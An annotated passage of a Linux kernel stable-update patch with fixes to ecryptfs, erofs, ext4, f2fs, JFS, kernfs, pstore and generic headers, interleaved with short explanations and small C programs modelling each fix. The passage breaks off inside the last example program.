+diff --git a/fs/ecryptfs/inode.c b/fs/ecryptfs/inode.c
+index c214fe0981bdc..55340ac61456c 100644
+--- a/fs/ecryptfs/inode.c
++++ b/fs/ecryptfs/inode.c
+@@ -76,6 +76,14 @@ static struct inode *__ecryptfs_get_inode(struct inode *lower_inode,
+ 
+ 	if (lower_inode->i_sb != ecryptfs_superblock_to_lower(sb))
+ 		return ERR_PTR(-EXDEV);
++
++	/* Reject dealing with casefold directories. */
++	if (IS_CASEFOLDED(lower_inode)) {
++		pr_err_ratelimited("%s: Can't handle casefolded directory.\n",
++				   __func__);
++		return ERR_PTR(-EREMOTE);
++	}
++
+ 	if (!igrab(lower_inode))
+ 		return ERR_PTR(-ESTALE);
+ 	inode = iget5_locked(sb, (unsigned long)lower_inode,
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf9a2fa7f55d2..47e71964eeff8 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -652,7 +652,6 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 
+ 	if (ztailpacking) {
+ 		pcl->obj.index = 0;	/* which indicates ztailpacking */
+-		pcl->pageofs_in = erofs_blkoff(map->m_pa);
+ 		pcl->tailpacking_size = map->m_plen;
+ 	} else {
+ 		pcl->obj.index = map->m_pa >> PAGE_SHIFT;
+@@ -852,6 +851,7 @@ repeat:
+ 		get_page(fe->map.buf.page);
+ 		WRITE_ONCE(fe->pcl->compressed_bvecs[0].page,
+ 			   fe->map.buf.page);
++		fe->pcl->pageofs_in = map->m_pa & ~PAGE_MASK;
+ 		fe->mode = Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE;
+ 	} else {
+ 		/* bind cache first when cached decompression is preferred */
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 33be702d6e380..c1515daf1def1 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6444,13 +6444,15 @@ static int ext4_try_to_trim_range(struct super_block *sb,
+ __acquires(ext4_group_lock_ptr(sb, e4b->bd_group))
+ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ {
+-	ext4_grpblk_t next, count, free_count;
++	ext4_grpblk_t next, count, free_count, last, origin_start;
+ 	bool set_trimmed = false;
+ 	void *bitmap;
+ 
++	last = ext4_last_grp_cluster(sb, e4b->bd_group);
+ 	bitmap = e4b->bd_bitmap;
+-	if (start == 0 && max >= ext4_last_grp_cluster(sb, e4b->bd_group))
++	if (start == 0 && max >= last)
+ 		set_trimmed = true;
++	origin_start = start;
+ 	start = max(e4b->bd_info->bb_first_free, start);
+ 	count = 0;
+ 	free_count = 0;
+@@ -6459,7 +6461,10 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 		start = mb_find_next_zero_bit(bitmap, max + 1, start);
+ 		if (start > max)
+ 			break;
+-		next = mb_find_next_bit(bitmap, max + 1, start);
++
++		next = mb_find_next_bit(bitmap, last + 1, start);
++		if (origin_start == 0 && next >= last)
++			set_trimmed = true;
+ 
+ 		if ((next - start) >= minblocks) {
+ 			int ret = ext4_trim_extent(sb, start, next - start, e4b);
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index 9833ab6db117c..f2ed15af703a8 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -231,17 +231,24 @@ struct ext4_new_flex_group_data {
+ 						   in the flex group */
+ 	__u16 *bg_flags;			/* block group flags of groups
+ 						   in @groups */
++	ext4_group_t resize_bg;			/* number of allocated
++						   new_group_data */
+ 	ext4_group_t count;			/* number of groups in @groups
+ 						 */
+ };
+ 
++/*
++ * Avoiding memory allocation failures due to too many groups added each time.
++ */
++#define MAX_RESIZE_BG				16384
++
+ /*
+  * alloc_flex_gd() allocates a ext4_new_flex_group_data with size of
+  * @flexbg_size.
+  *
+  * Returns NULL on failure otherwise address of the allocated structure.
+  */
+-static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned long flexbg_size)
++static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned int flexbg_size)
+ {
+ 	struct ext4_new_flex_group_data *flex_gd;
+ 
+@@ -249,17 +256,18 @@ static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned long flexbg_size)
+ 	if (flex_gd == NULL)
+ 		goto out3;
+ 
+-	if (flexbg_size >= UINT_MAX / sizeof(struct ext4_new_group_data))
+-		goto out2;
+-	flex_gd->count = flexbg_size;
++	if (unlikely(flexbg_size > MAX_RESIZE_BG))
++		flex_gd->resize_bg = MAX_RESIZE_BG;
++	else
++		flex_gd->resize_bg = flexbg_size;
+ 
+-	flex_gd->groups = kmalloc_array(flexbg_size,
++	flex_gd->groups = kmalloc_array(flex_gd->resize_bg,
+ 					sizeof(struct ext4_new_group_data),
+ 					GFP_NOFS);
+ 	if (flex_gd->groups == NULL)
+ 		goto out2;
+ 
+-	flex_gd->bg_flags = kmalloc_array(flexbg_size, sizeof(__u16),
++	flex_gd->bg_flags = kmalloc_array(flex_gd->resize_bg, sizeof(__u16),
+ 					  GFP_NOFS);
+ 	if (flex_gd->bg_flags == NULL)
+ 		goto out1;
+@@ -296,7 +304,7 @@ static void free_flex_gd(struct ext4_new_flex_group_data *flex_gd)
+  */
+ static int ext4_alloc_group_tables(struct super_block *sb,
+ 				struct ext4_new_flex_group_data *flex_gd,
+-				int flexbg_size)
++				unsigned int flexbg_size)
+ {
+ 	struct ext4_new_group_data *group_data = flex_gd->groups;
+ 	ext4_fsblk_t start_blk;
+@@ -397,12 +405,12 @@ next_group:
+ 		group = group_data[0].group;
+ 
+ 		printk(KERN_DEBUG "EXT4-fs: adding a flex group with "
+-		       "%d groups, flexbg size is %d:\n", flex_gd->count,
++		       "%u groups, flexbg size is %u:\n", flex_gd->count,
+ 		       flexbg_size);
+ 
+ 		for (i = 0; i < flex_gd->count; i++) {
+ 			ext4_debug(
+-			       "adding %s group %u: %u blocks (%d free, %d mdata blocks)\n",
++			       "adding %s group %u: %u blocks (%u free, %u mdata blocks)\n",
+ 			       ext4_bg_has_super(sb, group + i) ? "normal" :
+ 			       "no-super", group + i,
+ 			       group_data[i].blocks_count,
+@@ -1623,8 +1631,7 @@ exit:
+ 
+ static int ext4_setup_next_flex_gd(struct super_block *sb,
+ 				    struct ext4_new_flex_group_data *flex_gd,
+-				    ext4_fsblk_t n_blocks_count,
+-				    unsigned long flexbg_size)
++				    ext4_fsblk_t n_blocks_count)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+@@ -1648,7 +1655,7 @@ static int ext4_setup_next_flex_gd(struct super_block *sb,
+ 	BUG_ON(last);
+ 	ext4_get_group_no_and_offset(sb, n_blocks_count - 1, &n_group, &last);
+ 
+-	last_group = group | (flexbg_size - 1);
++	last_group = group | (flex_gd->resize_bg - 1);
+ 	if (last_group > n_group)
+ 		last_group = n_group;
+ 
+@@ -2010,8 +2017,9 @@ int ext4_resize_fs(struct super_block *sb, ext4_fsblk_t n_blocks_count)
+ 	ext4_fsblk_t o_blocks_count;
+ 	ext4_fsblk_t n_blocks_count_retry = 0;
+ 	unsigned long last_update_time = 0;
+-	int err = 0, flexbg_size = 1 << sbi->s_log_groups_per_flex;
++	int err = 0;
+ 	int meta_bg;
++	unsigned int flexbg_size = ext4_flex_bg_size(sbi);
+ 
+ 	/* See if the device is actually as big as what was requested */
+ 	bh = ext4_sb_bread(sb, n_blocks_count - 1, 0);
+@@ -2152,8 +2160,7 @@ retry:
+ 	/* Add flex groups. Note that a regular group is a
+ 	 * flex group with 1 group.
+ 	 */
+-	while (ext4_setup_next_flex_gd(sb, flex_gd, n_blocks_count,
+-					      flexbg_size)) {
++	while (ext4_setup_next_flex_gd(sb, flex_gd, n_blocks_count)) {
+ 		if (time_is_before_jiffies(last_update_time + HZ * 10)) {
+ 			if (last_update_time)
+ 				ext4_msg(sb, KERN_INFO,
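
alloc_flex_gd() now clamps the per-iteration group count to MAX_RESIZE_BG instead of allocating an array sized by an arbitrarily large flexbg. The clamp-then-allocate shape in isolation (error handling collapsed, kernel types replaced with plain C):

#include <stdio.h>
#include <stdlib.h>

#define MAX_RESIZE_BG 16384u

struct group_data { unsigned long group; };

struct flex_gd {
	unsigned int resize_bg;        /* capacity actually allocated */
	struct group_data *groups;
};

static struct flex_gd *alloc_flex_gd(unsigned int flexbg_size)
{
	struct flex_gd *gd = malloc(sizeof(*gd));

	if (!gd)
		return NULL;
	/* clamp instead of rejecting huge flex group sizes */
	gd->resize_bg = flexbg_size > MAX_RESIZE_BG ? MAX_RESIZE_BG
						    : flexbg_size;
	gd->groups = calloc(gd->resize_bg, sizeof(*gd->groups));
	if (!gd->groups) {
		free(gd);
		return NULL;
	}
	return gd;
}

int main(void)
{
	struct flex_gd *gd = alloc_flex_gd(1u << 20);

	if (gd)
		printf("allocated %u group slots\n", gd->resize_bg);
	return 0;
}
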
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 4cb58e8d699e2..3d9f6495a4db4 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1026,8 +1026,10 @@ static void set_cluster_dirty(struct compress_ctx *cc)
+ 	int i;
+ 
+ 	for (i = 0; i < cc->cluster_size; i++)
+-		if (cc->rpages[i])
++		if (cc->rpages[i]) {
+ 			set_page_dirty(cc->rpages[i]);
++			set_page_private_gcing(cc->rpages[i]);
++		}
+ }
+ 
+ static int prepare_compress_overwrite(struct compress_ctx *cc,
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index fd22854dbeaea..46e4960a9dcf7 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1326,6 +1326,7 @@ static int __clone_blkaddrs(struct inode *src_inode, struct inode *dst_inode,
+ 			}
+ 			memcpy_page(pdst, 0, psrc, 0, PAGE_SIZE);
+ 			set_page_dirty(pdst);
++			set_page_private_gcing(pdst);
+ 			f2fs_put_page(pdst, 1);
+ 			f2fs_put_page(psrc, 1);
+ 
+@@ -4037,6 +4038,7 @@ static int redirty_blocks(struct inode *inode, pgoff_t page_idx, int len)
+ 		f2fs_bug_on(F2FS_I_SB(inode), !page);
+ 
+ 		set_page_dirty(page);
++		set_page_private_gcing(page);
+ 		f2fs_put_page(page, 1);
+ 		f2fs_put_page(page, 0);
+ 	}
+diff --git a/fs/f2fs/recovery.c b/fs/f2fs/recovery.c
+index dea95b48b647d..53a6487f91e44 100644
+--- a/fs/f2fs/recovery.c
++++ b/fs/f2fs/recovery.c
+@@ -683,7 +683,16 @@ retry_dn:
+ 		 */
+ 		if (dest == NEW_ADDR) {
+ 			f2fs_truncate_data_blocks_range(&dn, 1);
+-			f2fs_reserve_new_block(&dn);
++			do {
++				err = f2fs_reserve_new_block(&dn);
++				if (err == -ENOSPC) {
++					f2fs_bug_on(sbi, 1);
++					break;
++				}
++			} while (err &&
++				IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++			if (err)
++				goto err;
+ 			continue;
+ 		}
+ 
+@@ -691,12 +700,14 @@ retry_dn:
+ 		if (f2fs_is_valid_blkaddr(sbi, dest, META_POR)) {
+ 
+ 			if (src == NULL_ADDR) {
+-				err = f2fs_reserve_new_block(&dn);
+-				while (err &&
+-				       IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION))
++				do {
+ 					err = f2fs_reserve_new_block(&dn);
+-				/* We should not get -ENOSPC */
+-				f2fs_bug_on(sbi, err);
++					if (err == -ENOSPC) {
++						f2fs_bug_on(sbi, 1);
++						break;
++					}
++				} while (err &&
++					IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
+ 				if (err)
+ 					goto err;
+ 			}
+@@ -887,6 +898,8 @@ skip:
+ 	if (!err && fix_curseg_write_pointer && !f2fs_readonly(sbi->sb) &&
+ 			f2fs_sb_has_blkzoned(sbi)) {
+ 		err = f2fs_fix_curseg_write_pointer(sbi);
++		if (!err)
++			err = f2fs_check_write_pointer(sbi);
+ 		ret = err;
+ 	}
+ 
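
Both recovery paths above now share one control flow: retry f2fs_reserve_new_block() only while fault injection is enabled, and treat -ENOSPC as fatal rather than asserting it cannot happen. A compact model of that loop, with a stub that fails twice before succeeding:

#include <errno.h>
#include <stdio.h>
#include <stdbool.h>

#define FAULT_INJECTION_ENABLED true  /* stands in for IS_ENABLED(...) */

static int reserve_new_block(void)
{
	static int injected_failures = 2;

	if (injected_failures-- > 0)
		return -EAGAIN;       /* injected transient failure */
	return 0;
}

int main(void)
{
	int err;

	do {
		err = reserve_new_block();
		if (err == -ENOSPC) {
			fprintf(stderr, "BUG: out of space in recovery\n");
			break;         /* fatal: do not spin forever */
		}
	} while (err && FAULT_INJECTION_ENABLED);

	printf("final err=%d\n", err);
	return err ? 1 : 0;
}
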
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 4d56f6081a5d2..4462274e325ac 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -63,10 +63,10 @@
+  */
+ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			int nblocks);
+-static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval);
+-static int dbBackSplit(dmtree_t * tp, int leafno);
+-static int dbJoin(dmtree_t * tp, int leafno, int newval);
+-static void dbAdjTree(dmtree_t * tp, int leafno, int newval);
++static void dbSplit(dmtree_t *tp, int leafno, int splitsz, int newval, bool is_ctl);
++static int dbBackSplit(dmtree_t *tp, int leafno, bool is_ctl);
++static int dbJoin(dmtree_t *tp, int leafno, int newval, bool is_ctl);
++static void dbAdjTree(dmtree_t *tp, int leafno, int newval, bool is_ctl);
+ static int dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc,
+ 		    int level);
+ static int dbAllocAny(struct bmap * bmp, s64 nblocks, int l2nb, s64 * results);
+@@ -2103,7 +2103,7 @@ static int dbFreeDmap(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 		 * system.
+ 		 */
+ 		if (dp->tree.stree[word] == NOFREE)
+-			dbBackSplit((dmtree_t *) & dp->tree, word);
++			dbBackSplit((dmtree_t *)&dp->tree, word, false);
+ 
+ 		dbAllocBits(bmp, dp, blkno, nblocks);
+ 	}
+@@ -2189,7 +2189,7 @@ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			 * the binary system of the leaves if need be.
+ 			 */
+ 			dbSplit(tp, word, BUDMIN,
+-				dbMaxBud((u8 *) & dp->wmap[word]));
++				dbMaxBud((u8 *)&dp->wmap[word]), false);
+ 
+ 			word += 1;
+ 		} else {
+@@ -2229,7 +2229,7 @@ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 				 * system of the leaves to reflect the current
+ 				 * allocation (size).
+ 				 */
+-				dbSplit(tp, word, size, NOFREE);
++				dbSplit(tp, word, size, NOFREE, false);
+ 
+ 				/* get the number of dmap words handled */
+ 				nw = BUDSIZE(size, BUDMIN);
+@@ -2336,7 +2336,7 @@ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			/* update the leaf for this dmap word.
+ 			 */
+ 			rc = dbJoin(tp, word,
+-				    dbMaxBud((u8 *) & dp->wmap[word]));
++				    dbMaxBud((u8 *)&dp->wmap[word]), false);
+ 			if (rc)
+ 				return rc;
+ 
+@@ -2369,7 +2369,7 @@ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 
+ 				/* update the leaf.
+ 				 */
+-				rc = dbJoin(tp, word, size);
++				rc = dbJoin(tp, word, size, false);
+ 				if (rc)
+ 					return rc;
+ 
+@@ -2521,16 +2521,16 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 		 * that it is at the front of a binary buddy system.
+ 		 */
+ 		if (oldval == NOFREE) {
+-			rc = dbBackSplit((dmtree_t *) dcp, leafno);
++			rc = dbBackSplit((dmtree_t *)dcp, leafno, true);
+ 			if (rc) {
+ 				release_metapage(mp);
+ 				return rc;
+ 			}
+ 			oldval = dcp->stree[ti];
+ 		}
+-		dbSplit((dmtree_t *) dcp, leafno, dcp->budmin, newval);
++		dbSplit((dmtree_t *) dcp, leafno, dcp->budmin, newval, true);
+ 	} else {
+-		rc = dbJoin((dmtree_t *) dcp, leafno, newval);
++		rc = dbJoin((dmtree_t *) dcp, leafno, newval, true);
+ 		if (rc) {
+ 			release_metapage(mp);
+ 			return rc;
+@@ -2561,7 +2561,7 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 				 */
+ 				if (alloc) {
+ 					dbJoin((dmtree_t *) dcp, leafno,
+-					       oldval);
++					       oldval, true);
+ 				} else {
+ 					/* the dbJoin() above might have
+ 					 * caused a larger binary buddy system
+@@ -2571,9 +2571,9 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+ 					 */
+ 					if (dcp->stree[ti] == NOFREE)
+ 						dbBackSplit((dmtree_t *)
+-							    dcp, leafno);
++							    dcp, leafno, true);
+ 					dbSplit((dmtree_t *) dcp, leafno,
+-						dcp->budmin, oldval);
++						dcp->budmin, oldval, true);
+ 				}
+ 
+ 				/* release the buffer and return the error.
+@@ -2621,7 +2621,7 @@ dbAdjCtl(struct bmap * bmp, s64 blkno, int newval, int alloc, int level)
+  *
+  * serialization: IREAD_LOCK(ipbmap) or IWRITE_LOCK(ipbmap) held on entry/exit;
+  */
+-static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
++static void dbSplit(dmtree_t *tp, int leafno, int splitsz, int newval, bool is_ctl)
+ {
+ 	int budsz;
+ 	int cursz;
+@@ -2643,7 +2643,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+ 		while (cursz >= splitsz) {
+ 			/* update the buddy's leaf with its new value.
+ 			 */
+-			dbAdjTree(tp, leafno ^ budsz, cursz);
++			dbAdjTree(tp, leafno ^ budsz, cursz, is_ctl);
+ 
+ 			/* on to the next size and buddy.
+ 			 */
+@@ -2655,7 +2655,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+ 	/* adjust the dmap tree to reflect the specified leaf's new
+ 	 * value.
+ 	 */
+-	dbAdjTree(tp, leafno, newval);
++	dbAdjTree(tp, leafno, newval, is_ctl);
+ }
+ 
+ 
+@@ -2686,7 +2686,7 @@ static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval)
+  *
+  * serialization: IREAD_LOCK(ipbmap) or IWRITE_LOCK(ipbmap) held on entry/exit;
+  */
+-static int dbBackSplit(dmtree_t * tp, int leafno)
++static int dbBackSplit(dmtree_t *tp, int leafno, bool is_ctl)
+ {
+ 	int budsz, bud, w, bsz, size;
+ 	int cursz;
+@@ -2737,7 +2737,7 @@ static int dbBackSplit(dmtree_t * tp, int leafno)
+ 				 * system in two.
+ 				 */
+ 				cursz = leaf[bud] - 1;
+-				dbSplit(tp, bud, cursz, cursz);
++				dbSplit(tp, bud, cursz, cursz, is_ctl);
+ 				break;
+ 			}
+ 		}
+@@ -2765,7 +2765,7 @@ static int dbBackSplit(dmtree_t * tp, int leafno)
+  *
+  * RETURN VALUES: none
+  */
+-static int dbJoin(dmtree_t * tp, int leafno, int newval)
++static int dbJoin(dmtree_t *tp, int leafno, int newval, bool is_ctl)
+ {
+ 	int budsz, buddy;
+ 	s8 *leaf;
+@@ -2820,12 +2820,12 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+ 			if (leafno < buddy) {
+ 				/* leafno is the left buddy.
+ 				 */
+-				dbAdjTree(tp, buddy, NOFREE);
++				dbAdjTree(tp, buddy, NOFREE, is_ctl);
+ 			} else {
+ 				/* buddy is the left buddy and becomes
+ 				 * leafno.
+ 				 */
+-				dbAdjTree(tp, leafno, NOFREE);
++				dbAdjTree(tp, leafno, NOFREE, is_ctl);
+ 				leafno = buddy;
+ 			}
+ 
+@@ -2838,7 +2838,7 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+ 
+ 	/* update the leaf value.
+ 	 */
+-	dbAdjTree(tp, leafno, newval);
++	dbAdjTree(tp, leafno, newval, is_ctl);
+ 
+ 	return 0;
+ }
+@@ -2859,15 +2859,20 @@ static int dbJoin(dmtree_t * tp, int leafno, int newval)
+  *
+  * RETURN VALUES: none
+  */
+-static void dbAdjTree(dmtree_t * tp, int leafno, int newval)
++static void dbAdjTree(dmtree_t *tp, int leafno, int newval, bool is_ctl)
+ {
+ 	int lp, pp, k;
+-	int max;
++	int max, size;
++
++	size = is_ctl ? CTLTREESIZE : TREESIZE;
+ 
+ 	/* pick up the index of the leaf for this leafno.
+ 	 */
+ 	lp = leafno + le32_to_cpu(tp->dmt_leafidx);
+ 
++	if (WARN_ON_ONCE(lp >= size || lp < 0))
++		return;
++
+ 	/* is the current value the same as the old value ?  if so,
+ 	 * there is nothing to do.
+ 	 */
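
dbAdjTree() now picks the tree size from whether it is adjusting a control page (CTLTREESIZE) or a regular dmap (TREESIZE) and refuses out-of-range leaf indices instead of writing past the array. The guard in isolation, with hypothetical sizes and a simplified WARN_ON():

#include <stdio.h>

#define TREESIZE    128            /* hypothetical leaf-array sizes */
#define CTLTREESIZE 32
#define WARN_ON(c) \
	((c) ? (fprintf(stderr, "WARN: %s\n", #c), 1) : 0)

static signed char stree[TREESIZE];

static void adj_tree(int leafno, int leafidx, int newval, int is_ctl)
{
	int size = is_ctl ? CTLTREESIZE : TREESIZE;
	int lp = leafno + leafidx;

	/* reject corrupted on-disk indices before touching the array */
	if (WARN_ON(lp >= size || lp < 0))
		return;
	stree[lp] = (signed char)newval;
}

int main(void)
{
	adj_tree(5, 10, 3, 0);     /* ok: 15 < TREESIZE */
	adj_tree(40, 0, 3, 1);     /* rejected: 40 >= CTLTREESIZE */
	printf("stree[15]=%d\n", stree[15]);
	return 0;
}
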
+diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c
+index 92b7c533407c1..031d8f570f581 100644
+--- a/fs/jfs/jfs_dtree.c
++++ b/fs/jfs/jfs_dtree.c
+@@ -633,6 +633,11 @@ int dtSearch(struct inode *ip, struct component_name * key, ino_t * data,
+ 		for (base = 0, lim = p->header.nextindex; lim; lim >>= 1) {
+ 			index = base + (lim >> 1);
+ 
++			if (stbl[index] < 0) {
++				rc = -EIO;
++				goto out;
++			}
++
+ 			if (p->header.flag & BT_LEAF) {
+ 				/* uppercase leaf name to compare */
+ 				cmp =
+@@ -1970,7 +1975,7 @@ static int dtSplitRoot(tid_t tid,
+ 		do {
+ 			f = &rp->slot[fsi];
+ 			fsi = f->next;
+-		} while (fsi != -1);
++		} while (fsi >= 0);
+ 
+ 		f->next = n;
+ 	}
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 6ed2e1d4c894f..ac42f8ee553fc 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -2179,6 +2179,9 @@ static int diNewExt(struct inomap * imap, struct iag * iagp, int extno)
+ 	/* get the ag and iag numbers for this iag.
+ 	 */
+ 	agno = BLKTOAG(le64_to_cpu(iagp->agstart), sbi);
++	if (agno >= MAXAG || agno < 0)
++		return -EIO;
++
+ 	iagno = le32_to_cpu(iagp->iagnum);
+ 
+ 	/* check if this is the last free extent within the
+diff --git a/fs/jfs/jfs_mount.c b/fs/jfs/jfs_mount.c
+index 48d1f70f786cf..21d8d4a5c67a1 100644
+--- a/fs/jfs/jfs_mount.c
++++ b/fs/jfs/jfs_mount.c
+@@ -172,15 +172,15 @@ int jfs_mount(struct super_block *sb)
+ 	}
+ 	jfs_info("jfs_mount: ipimap:0x%p", ipimap);
+ 
+-	/* map further access of per fileset inodes by the fileset inode */
+-	sbi->ipimap = ipimap;
+-
+ 	/* initialize fileset inode allocation map */
+ 	if ((rc = diMount(ipimap))) {
+ 		jfs_err("jfs_mount: diMount failed w/rc = %d", rc);
+ 		goto err_ipimap;
+ 	}
+ 
++	/* map further access of per fileset inodes by the fileset inode */
++	sbi->ipimap = ipimap;
++
+ 	return rc;
+ 
+ 	/*
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index 44842e6cf0a9b..a00e11ebfa775 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -669,6 +669,18 @@ struct kernfs_node *kernfs_new_node(struct kernfs_node *parent,
+ {
+ 	struct kernfs_node *kn;
+ 
++	if (parent->mode & S_ISGID) {
++		/* this code block imitates inode_init_owner() for
++		 * kernfs
++		 */
++
++		if (parent->iattr)
++			gid = parent->iattr->ia_gid;
++
++		if (flags & KERNFS_DIR)
++			mode |= S_ISGID;
++	}
++
+ 	kn = __kernfs_new_node(kernfs_root(parent), parent,
+ 			       name, mode, uid, gid, flags);
+ 	if (kn) {
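
The kernfs hunk mirrors inode_init_owner()'s setgid-directory semantics: a node created under an S_ISGID directory inherits the parent's group, and child directories keep the S_ISGID bit. Just that mode/gid computation, with kernfs types reduced to plain integers:

#include <stdio.h>
#include <sys/stat.h>     /* S_ISGID, S_IFDIR */

struct node {
	unsigned int mode;
	unsigned int gid;
};

static void init_owner(struct node *child, const struct node *parent,
		       unsigned int req_gid, int is_dir)
{
	child->gid = req_gid;
	if (parent->mode & S_ISGID) {
		/* inherit the group of the setgid parent directory */
		child->gid = parent->gid;
		if (is_dir)
			child->mode |= S_ISGID;
	}
}

int main(void)
{
	struct node parent = { .mode = S_IFDIR | S_ISGID | 0775, .gid = 100 };
	struct node child  = { .mode = S_IFDIR | 0755 };

	init_owner(&child, &parent, 0, 1);
	printf("child gid=%u setgid=%d\n",
	       child.gid, !!(child.mode & S_ISGID));
	return 0;
}
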
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index f3fa3625d772c..e15b4631364a8 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -519,6 +519,7 @@ static int ramoops_init_przs(const char *name,
+ 	}
+ 
+ 	zone_sz = mem_sz / *cnt;
++	zone_sz = ALIGN_DOWN(zone_sz, 2);
+ 	if (!zone_sz) {
+ 		dev_err(dev, "%s zone size == 0\n", name);
+ 		goto fail;
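
Rounding the per-zone size down to an even number keeps the two halves of each persistent RAM zone equal. A simplified power-of-two variant of ALIGN_DOWN() showing the effect:

#include <stdio.h>

/* simplified power-of-two variant of the kernel's ALIGN_DOWN() */
#define ALIGN_DOWN(x, a)  ((x) & ~((unsigned long)(a) - 1))

int main(void)
{
	unsigned long mem_sz = 4099, cnt = 2;
	unsigned long zone_sz = mem_sz / cnt;      /* 2049, odd */

	zone_sz = ALIGN_DOWN(zone_sz, 2);          /* 2048 */
	printf("zone_sz=%lu\n", zone_sz);
	return 0;
}
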
+diff --git a/include/asm-generic/numa.h b/include/asm-generic/numa.h
+index 1a3ad6d298330..c32e0cf23c909 100644
+--- a/include/asm-generic/numa.h
++++ b/include/asm-generic/numa.h
+@@ -35,6 +35,7 @@ int __init numa_add_memblk(int nodeid, u64 start, u64 end);
+ void __init numa_set_distance(int from, int to, int distance);
+ void __init numa_free_distance(void);
+ void __init early_map_cpu_to_node(unsigned int cpu, int nid);
++int __init early_cpu_to_node(int cpu);
+ void numa_store_cpu_info(unsigned int cpu);
+ void numa_add_cpu(unsigned int cpu);
+ void numa_remove_cpu(unsigned int cpu);
+@@ -46,6 +47,7 @@ static inline void numa_add_cpu(unsigned int cpu) { }
+ static inline void numa_remove_cpu(unsigned int cpu) { }
+ static inline void arch_numa_init(void) { }
+ static inline void early_map_cpu_to_node(unsigned int cpu, int nid) { }
++static inline int early_cpu_to_node(int cpu) { return 0; }
+ 
+ #endif	/* CONFIG_NUMA */
+ 
+diff --git a/include/asm-generic/unaligned.h b/include/asm-generic/unaligned.h
+index 699650f819706..a84c64e5f11ec 100644
+--- a/include/asm-generic/unaligned.h
++++ b/include/asm-generic/unaligned.h
+@@ -104,9 +104,9 @@ static inline u32 get_unaligned_le24(const void *p)
+ 
+ static inline void __put_unaligned_be24(const u32 val, u8 *p)
+ {
+-	*p++ = val >> 16;
+-	*p++ = val >> 8;
+-	*p++ = val;
++	*p++ = (val >> 16) & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = val & 0xff;
+ }
+ 
+ static inline void put_unaligned_be24(const u32 val, void *p)
+@@ -116,9 +116,9 @@ static inline void put_unaligned_be24(const u32 val, void *p)
+ 
+ static inline void __put_unaligned_le24(const u32 val, u8 *p)
+ {
+-	*p++ = val;
+-	*p++ = val >> 8;
+-	*p++ = val >> 16;
++	*p++ = val & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = (val >> 16) & 0xff;
+ }
+ 
+ static inline void put_unaligned_le24(const u32 val, void *p)
+@@ -128,12 +128,12 @@ static inline void put_unaligned_le24(const u32 val, void *p)
+ 
+ static inline void __put_unaligned_be48(const u64 val, u8 *p)
+ {
+-	*p++ = val >> 40;
+-	*p++ = val >> 32;
+-	*p++ = val >> 24;
+-	*p++ = val >> 16;
+-	*p++ = val >> 8;
+-	*p++ = val;
++	*p++ = (val >> 40) & 0xff;
++	*p++ = (val >> 32) & 0xff;
++	*p++ = (val >> 24) & 0xff;
++	*p++ = (val >> 16) & 0xff;
++	*p++ = (val >> 8) & 0xff;
++	*p++ = val & 0xff;
+ }
+ 
+ static inline void put_unaligned_be48(const u64 val, void *p)
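
Masking each shifted byte with 0xff does not change the stored bytes; it makes the intended truncation explicit and quiets conversion warnings. A userspace roundtrip check of the 24-bit big-endian helpers as patched:

#include <stdio.h>
#include <stdint.h>

static void put_unaligned_be24(uint32_t val, uint8_t *p)
{
	*p++ = (val >> 16) & 0xff;
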